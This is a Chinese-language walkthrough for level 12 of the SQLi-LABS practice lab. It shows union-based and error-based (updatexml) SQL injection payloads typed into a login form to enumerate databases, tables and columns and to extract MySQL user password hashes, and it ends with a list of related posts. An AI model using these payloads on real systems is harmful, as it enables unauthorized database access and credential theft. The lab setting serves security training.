SQLi LABS Less-12 联合注入+报错注入
第十二关是双引号+括号的字符型注入 , 推荐使用联合注入、报错注入。
方式一:联合注入
参考文章:联合注入使用详解 原理+步骤+实战教程
第一步、判断注入类型
用户名输入:a") or 1 -- a
密码随便输入:1,页面正常显示
用户名输入: a") or 0 -- a
密码随便输入:1,页面异常(空)显示
第二步、判断字段数
用户名依次输入:
a") order by 1 -- a
a") order by 2 -- a
a") order by 3 -- a
密码随便输入:1
按照第三个字段排序时开始报错,确定返回结果的字段数为 3.
第三步、判断显示位
用户名输入:a") union select 1,2 -- a
密码随便输入:1
第四步、脱库
获取所有数据库,用户名输入:
a") union select 1,(select group_concat(schema_name) from information_schema.schemata
) -- a密码随便输入:1
获取 security 库的所有表,用户名输入:
a") union select 1,(select group_concat(table_name) from information_schema.tableswhere table_schema='security'
) -- a密码随便输入:1
获取 users 表的所有字段,用户名输入:
a") union select 1,(select group_concat(column_name) from information_schema.columnswhere table_schema='security' and table_name='users'
) -- a密码随便输入:1
获取数据库用户的密码,用户名输入:
a") union select 1,(select group_concat(user,password) from mysql.user where user = 'mituan'
) -- a密码随便输入:1
方式二:报错注入
参考文章:报错注入使用详解 原理+步骤+实战教程
第一步、判断是否报错
用户名输入:a"
密码随便输入:1
页面显示数据库的报错信息,适合使用报错注入。
第二步、判断报错条件
用户名输入:a") and updatexml(1,0x7e,3) -- a
密码随便输入:1
页面正常显示报错信息,确定报错函数可用。
第三步、脱库
获取所有数据库,用户名输入:
a") and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),33,32))
,3) -- a密码随便输入:1
获取 security 库的所有表,用户名输入:
a") and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tableswhere table_schema='security'),1,32))
,3) -- a密码随便输入:1
获取 users 表的所有字段,用户名输入:
a") and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columnswhere table_schema='security' and table_name='users'),1,32))
,3) -- a密码随便输入:1
获取数据库用户的密码,用户名输入;
a") and updatexml(1,concat(0x7e,(select group_concat(user,password) from mysql.user where user = 'mituan'))
,3) -- a密码随便输入:1
推荐专栏
《网络安全快速入门》用最短的时间,掌握最核心的网络安全技术。
《靶场通关教程》 各种靶场的通关教程,持续更新……
SQLi LABS Less-12 联合注入+报错注入相关推荐
- SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注
第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...
- SQLi LABS Less 25 联合注入+报错注入+布尔盲注
第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...
- SQLi LABS Less-26 联合注入+报错注入+布尔盲注+时间盲注
第26关是单引号字符型注入: 后台过滤了关键字( and or ),注释(/* # -- /),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 目录 一.功能分析 二 ...
- SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用
Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https ...
- SQLi LABS Less 23 联合注入+报错注入+布尔盲注
第23关是单引号字符型注入: 过滤了注释,使用闭合引号来绕过: 这篇文章提供联合注入.报错注入.布尔盲注三种解题方式. 一.功能分析 这一关是一个简单的查询功能,在地址栏输入id,后台根据id查询数据 ...
- SQLi LABS Less-11 联合注入+报错注入
第十一关是单引号字符型注入,推荐使用联合注入.报错注入 方式一:联合注入 参考文章:联合注入使用详解 原理+步骤+实战教程 第一步.判断注入类型 用户名输入: a' or 1 -- a 密码随便输入: ...
- SQLi LABS Less-4 联合注入+报错注入
第四关是双引号+括号的字符型注入,推荐使用联合注入.报错注入 方式一:联合注入 参考文章:联合注入使用详解 原理+步骤+实战教程 第一步.判断注入类型 地址栏输入 ?id=1") and 1 ...
- SQLi LABS Less-3 联合注入+报错注入
第三关是单引号+括号的字符型注入 ,推荐使用联合注入.报错注入. 方式一:联合注入 推荐文章:联合注入使用详解,原理+步骤+实战教程 第一步.判断注入点类型 地址栏输入 ?id=1') and 1 - ...
- SQLi Labs Less-1 联合注入+报错注入
第一关是单引号字符型注入,推荐使用联合注入.报错注入 方式一:联合注入 参考文章:联合注入使用详解,原理+步骤+实战案例 第一步.判断注入点 地址栏输入:?id=1' and 1 -- a,正常显示 ...
最新文章
- 32岁程序员面试被拒:比又穷又忙更可怕的,是2020年你还不懂...
- Linux系统下活用History命令
- 算法竞赛入门经典读书笔记(三)7.2枚举排列
- 如何数据整合IBM Tivoli
- java在线预览txt、word、ppt、execel,pdf代码
- 设计模式C++实现--Observer模式
- css3动画animation,transition
- 微软在线office online 使用时遇到的一些问题
- raspberry pi_在Raspberry Pi上使用Mathematica进行高级数学运算
- HTML怎么写入形状,css3写各种形状(收集篇...)
- win10 查看系统开机历史记录
- JavaScript-RegExp及String的正则表达式处理方法
- qmail加防病毒网关的郁闷经历
- SLG手游策略游戏-分析思维
- 静心解压,或许你需要一个电子木鱼
- 修改计算机参数,缺氧参数怎么修改 游戏内参数修改方法解答
- 如何配置SQL Server 2008管理器_过路老熊_新浪博客
- Android 向联系人名单新加联系人(添加名称和电话号码两项)
- python 自动点赞_python实现在有漏洞的网站实现自动注册、登录、点赞
- 宝清县职业技术学校计算机,宝清县职业技术学校开展 “3+2”贯通培养模式 为广大学子铺就全新成才之路...
热门文章
- Linux 驱动面试题总结【转】
- cvBoundingRect的用法(转)
- 什么是Web Service
- atoi 原来将字符串02002xzm100转换为int以后是2002
- Netty工作笔记0025---SocketChannel API
- c++工作笔记001---c++相关零碎要点_endl、“\n”和‘\n’区别_extern int a关键字_-的意思_::的意思_指针和引用的区别
- Linux学习笔记009---Centos7安装vim ifconfig wget tree等基础命令
- Android学习笔记11---_查看与输出日志信息
- Oracle零碎要点---多表联合查询,收集数据库基本资料
- resnet 50 网络分析